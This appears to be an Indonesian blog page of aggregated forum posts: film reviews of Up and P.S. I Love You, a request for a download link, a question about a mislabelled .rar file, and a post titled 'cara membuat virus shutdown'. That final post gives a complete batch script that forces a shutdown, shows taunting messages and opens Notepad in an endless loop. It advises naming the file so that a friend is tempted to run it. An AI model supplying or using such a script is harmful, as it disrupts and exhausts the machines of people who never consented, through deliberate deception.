selamat datang

acon free

Get Free Premium Account Rapidshare Megaupload Hotfile

free download firmware lenkap

bisnis paling gratis

informasi berhadiah

iNeedSell.com: Free online ads. Post your Ad here.

Kamis, 01 September 2011

Situs Download Film & Software GRATIS TERBESAR Di Indonesia

Situs Download Film & Software GRATIS TERBESAR Di Indonesia

Link to The Largest Indonesian Hi-Tech and IT Community

Up (2009)

Posted: 01 Sep 2011 07:18 PM PDT


Informasi Umum Seputar Film Terbaru Up di Bioskop
  • Genre: Animation | Adventure | Comedy
  • Tanggal Rilis: 29 July 2009 (Indonesia)
Saksikan Film Terbaru di Bioskop Kesayangan anda. Tonton Film Up di Bioskop Jakarta Bandung Medan Surabaya Semarang Makasar Denpasar di Bioskop kesayangan di Kota Anda.

Sutradara, Aktris, dan Aktor Pemain Film Up di Bioskop
  • Sutradara: Pete Docter, Bob Peterson
  • Penulis: Pete Docter, Bob Peterson
  • Pemain: Edward Asner, Jordan Nagai and John Ratzenberger
Jalan Cerita / Sinopsis / Review
Seumur hidup, Carl Fredricksen (Edward Asner) selalu memimpikan sebuah petualangan besar. Ia selalu ingin menjelajahi daerah-daerah baru dan pergi berkeliling dunia. Sayangnya hingga ia berusia 78 tahun, semua itu hanya sekedar impian saja dan tak pernah jadi kenyataan.

Setelah istrinya meninggal, Carl mendapat masalah baru. Rumahnya akan digusur dan ia terancam berakhir di panti jompo. Merasa tak ada lagi yang bisa menghalanginya melakukan petualangan seperti yang ia impikan, Carl pun bertekad membawa rumahnya pergi mengelilingi dunia. Untuk mencapai tujuannya, Carl mengikatkan ribuan balon ke rumahnya dan menjadikan seluruh rumahnya sebuah balon terbang.

Celakanya, ada satu yang tak ia perhitungkan sebelumnya. Tanpa ia sadari, ternyata Russell (Jordan Nagai), anak berusia delapan tahun yang punya rasa ingin tahu berlebihan, ternyata ikut terbawa dalam perjalanan. Akhirnya, mau tak mau Carl harus membawa pergi Russell juga dan berharap bahwa mereka tak akan terlibat masalah besar karena ulah Russell ini.

Siapa yang tak kenal Pixar. Perusahaan animasi yang dipelopori oleh Steve Jobs, petinggi Apple, ini memang adalah perusahaan animasi yang selalu menyajikan film animasi berkualitas tinggi. Kalau tak percaya, lihat saja WALL-E yang berhasil memukau penonton dengan animasi nyaris tanpa dialog ini. Kesuksesan Pixar tak berhenti sampai di sini, kali ini Pixar kembali menawarkan animasi dengan konsep yang berbeda dari WALL-E.

Film berjudul singkat, 'UP', ini berkisah tentang sebuah kondisi yang sebenarnya hanya akan dimengerti oleh orang dewasa saja namun dengan pengolahan alur cerita yang menarik, konsep itu tak akan sulit diterima anak kecil dengan penalaran yang masih terbatas. Ide tentang mimpi yang tertunda, kehilangan orang yang dicintai dan kekecewaan yang kadang membawa berkah memang tak mudah dicerna anak-anak namun di situlah keunggulan film ini. Menyederhanakan konsep yang rumit itu.

Soal kualitas animasi, barangkali tak perlu dibahas lagi. Seperti biasa, Pixar tak akan melepas sebuah film animasi tanpa pengerjaan yang benar-benar sempurna. Didukung oleh pengisi suara yang sama handalnya maka lengkap sudah senjata film ini untuk merebut minat pasar. Karena penuangan ide yang brilian maka jelas range penonton film ini pun tak akan terbatas pada anak kecil saja. Orang dewasa pun dapat menikmati film ini tanpa merasa bosan. Range usia penonton yang lebar ini pun terwakili oleh dua karakter utama yang berbeda usia tujuh puluh tahun.

Pendek kata, durasi film sepanjang 89 menit seolah berlalu dengan cepat karena sepanjang film penonton akan dimanjakan dengan suguhan visual yang apik, karakter yang cukup kompleks dan terlihat hidup, pengisian suara yang benar-benar menjiwai, dan tentu saja sebuah cerita yang menghibur namun juga memberikan sedikit pencerahan buat mereka yang sedang dirundung duka.


VIDEO TRAILER FROM YOUTUBE


-----------------------------------------------------------------------------------------------
Demikian informasi Film Up yang bisa kami Berikan. Semoga dengan adanya Review Film Up ini bisa menjadi bahan pertimbangan Anda untuk Nonton Up di Bioskop Jakarta Bandung Medan Surabaya Semarang Yogyakarta dan Denpasar atau bisa juga dengan membeli DVD Film Asli Up di Toko Kaset terdekat di Kota Kesayangan Anda.


(rb/id|Uppu)
[Hanya Member Aktif Yang Dapat Melihat Link. Register Sekarang]

P.S. I Love You (2007)

Posted: 01 Sep 2011 07:13 PM PDT


Informasi Umum Seputar Film Terbaru P.S. I Love You di Bioskop
  • Genre: Drama | Romance
  • Tanggal Rilis: 6 February 2008 (Indonesia)
Saksikan Film Terbaru di Bioskop Kesayangan anda. Tonton Film P.S. I Love You di Bioskop Jakarta Bandung Medan Surabaya Semarang Makasar Denpasar di Bioskop kesayangan di Kota Anda.

Sutradara, Aktris, dan Aktor Pemain Film P.S. I Love You di Bioskop
  • Sutradara: Richard LaGravenese
  • Penulis: Richard LaGravenese, Steven Rogers
  • Pemain: Hilary Swank, Gerard Butler and Harry Connick Jr.
Jalan Cerita / Sinopsis / Review
Bulan Februari selalu penuh dengan hal-hal romantis. Ya apalagi kalau bukan untuk memperingati hari kasih sayang yang jatuh di tanggal 14. Hollywood pun tak mau ketinggalan dalam menyemarakkan event tersebut. Salah satunya adalah film berjudul P.S. I LOVE YOU yang juga turut meramaikan kisah cinta di bioskop-bioskop tanah air.

Film ini diadaptasi dari novel berjudul sama yang dikarang oleh Cecelia Ahern putri dari Bertie Ahern, Perdana Menteri Irlandia saat ini. Tokoh utama film ini dipercayakan pada peraih 2 Oscar, Hilary Swank, sebagai Holly, wanita yang ditinggal mati suami tercinta, Gerry (Gerard Butler).

Gerry yang berkebangsaan Irlandia adalah segalanya bagi Holly. Mereka bertemu saat Holly sedang ikut rombongan wisata kampus ke Irlandia. Pertemuan itu berlanjut ke pernikahan yang sangat bahagia. Sayang kebahagiaan mereka tidak seperti dongeng, yang berlangsung selamanya. Tumor otak yang diderita Gerry memisahkan mereka berdua.

Kepergian Gerry menjadi hal terberat yang harus diterima Holly. Dunia Holly seakan runtuh, belahan jiwanya telah pergi. Dia mengurung diri selama berminggu-minggu, menjadi sosok perempuan lemah, penyendiri, menyesali kehidupan dan tanpa aktivitas yang berguna, tak mengurus dirinya juga apartemennya.

Sampai pada hari ulang tahunnya yang ke-30. Hari itu, ibu (Kathy Bates) dan kedua sahabatnya, Denise (Lisa Kudrow) dan Sharon (Gina Gershon) mendatangi Holly yang berada dalam keadaan menyedihkan di apartemennya yang kotor.

Tak hanya ibu dan kedua sahabatnya, Gerry pun hadir. Tak lagi berwujud raga, Gerry hadir dalam bentuk tape recorder dan sebuah kue ulang tahun. Sebelum meninggal Gerry ternyata telah menyiapkan segalanya. Dari rekaman tersebut Gerry meminta Holly untuk keluar merayakan ulang tahunnya agar tidak murung terus. Gerry juga menyatakan akan menyurati Holly setiap bulannya. Surat-surat itu berisi 'tugas-tugas' dari Gerry yang harus dilakukan Holly.

Melalui surat-surat ini Gerry seperti membimbing Holly agar ia dapat lebih percaya diri dan membantunya untuk menata kembali kehidupannya. Dalam setiap akhir suratnya, Gerry selalu menyertakan: P.S I Love You. Dari sudut pandang Holly, kehadiran Gerry seperti benar-benar nyata tak hanya berwujud kata-kata.

Surat-surat Gerry juga mengantarkan Holly pada petualangan bersama kedua sahabatnya. Pengalaman menyentuh, menarik, memalukan menyertai perjalanan mereka. Tak hanya itu, perjalanan tersebut juga mengantarkan Holly pada kehidupan Gerry di Irlandia.

Perjalanan-perjalanan itu memberikan hikmah besar pada diri Holly. Dari sanalah Holly menemukan ulang arti tentang pernikahan, persahabatan, dan bagaimana cinta yang begitu kuat dapat mengubah kematian menjadi awal dari kehidupan yang baru.

Film garapan sutradara Richard LaGravenese ini berhasil membuat film yang seharusnya sedih menjadi lebih ringan dengan banyaknya selipan humor. Tak hanya itu, ia juga berhasil membuat penggambaran sempurna tentang keindahan alam Irlandia. Penggambaran karakter tokoh-tokohnya pun sangat kuat. Ditunjang pula dengan kemampuan akting kelas wahid para aktor/aktrisnya.

Yang paling berkesan adalah upaya Gerry (melalui surat-suratnya) untuk menyadarkan Holly bahwa sendirian atau bersama orang lain, setiap orang harus melanjutkan hidupnya. Apalagi Gerry melakukannya dengan cara yang elegan, tak memaksa ataupun menggurui. Hal ini pun bisa menjadi nasehat berharga bagi orang yang baru saja kehilangan atau berpisah dari orang yang dicintai. Film yang sangat sesuai pula ditonton oleh pasangan yang sedang dilanda masalah, untuk mengingatkan kembali kekuatan cinta yang dulu pernah menyatukan mereka.


VIDEO TRAILER FROM YOUTUBE


-----------------------------------------------------------------------------------------------
Demikian informasi Film P.S. I Love You yang bisa kami Berikan. Semoga dengan adanya Review Film P.S. I Love You ini bisa menjadi bahan pertimbangan Anda untuk Nonton P.S. I Love You di Bioskop Jakarta Bandung Medan Surabaya Semarang Yogyakarta dan Denpasar atau bisa juga dengan membeli DVD Film Asli P.S. I Love You di Toko Kaset terdekat di Kota Kesayangan Anda.


(rb/id|Pslvu)
[Hanya Member Aktif Yang Dapat Melihat Link. Register Sekarang]

Nanya film The Blind Side

Posted: 01 Sep 2011 09:38 AM PDT

Agan sekalian..

ada yg tau link buat download film The Blind Side nggk..?? :confused: :confused: :confused:

maaf kLo n9erePotin.. :o:o:o

JaNGan di :mad: yaaa.. :) :) :)

cara ngubah file html menjadi rar

Posted: 31 Aug 2011 07:25 AM PDT

heleeeeeeeep...
wa abis dunlud game,,, kata si empu yg uplud format file na *.rar,,, nyatanya abis wa dunlud format file na *.html,,, lah kok gini... :confused:

nah wa pikir ni karna si empu yg uplud ngasih buntut nama file na dengan *.html....

trus wa gnti "open with" tuh file yg wa dunlud dgn rar,,, trnyata bisa dibuka,,,
tp file dgn frmat *.html smua na lari ke winrar...

bisa jg dibuka langsung dari Winrar...
tpi ribet harus bukak folder t4 tuh file disimpatn :(

nah buat agan-agan yg tau solusina, tulung kasih pencerahan....
dah ane coba rename tpi kagak manjur.... atu ane slah cara merename na...
heeeeleeeeppp...

cara membuat virus shutdown

Posted: 30 Aug 2011 11:16 AM PDT

agan''..mavv sblmnya mngkin nie uda prnh da yg denger ttg buat virus shutdown.

ane mwu berbagi aje..tujuan dr nie cm untuk ngerjain temen aje..
Langsung aje ye!!

langkah 1:
ketikkan [copas] script dbwh nie pd notped n simpen dgn ekstensi .bat.

@echo off
title :: Surprise ::
:menu
cls
echo Tolong Sebutkan Jenis Kelamin Anda?
pause
echo Silahkan Pilih Salah Satu:
echo 1. Laki-laki
echo 2. Perempuan
echo 3. Tidak Jelas
set input=nothing
set /p input=Choice:
if %input%==1 shutdown -s -t 15
if %input%==2 shutdown -s -t 20
if %input%==3 shutdown -s -t 25
msg * Hehehe....jadi bingung Yahh ^_^
msg * Tenang...nggak perlu bingung
msg * Lhooo....kok jadi Error Semua???
msg * Panik Yah.....
msg * Butuh Solusi???
msg * weeekkk
msg * duorrr
msg * kena deh
msg * Pisssss!!!!
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

NB: tulisan yg tebal bisa dganti sesuai keinginan

trus save dgn nama yg cukup membuat tmn agan penasaran utk d klik.

^_^

Tidak ada komentar:

Posting Komentar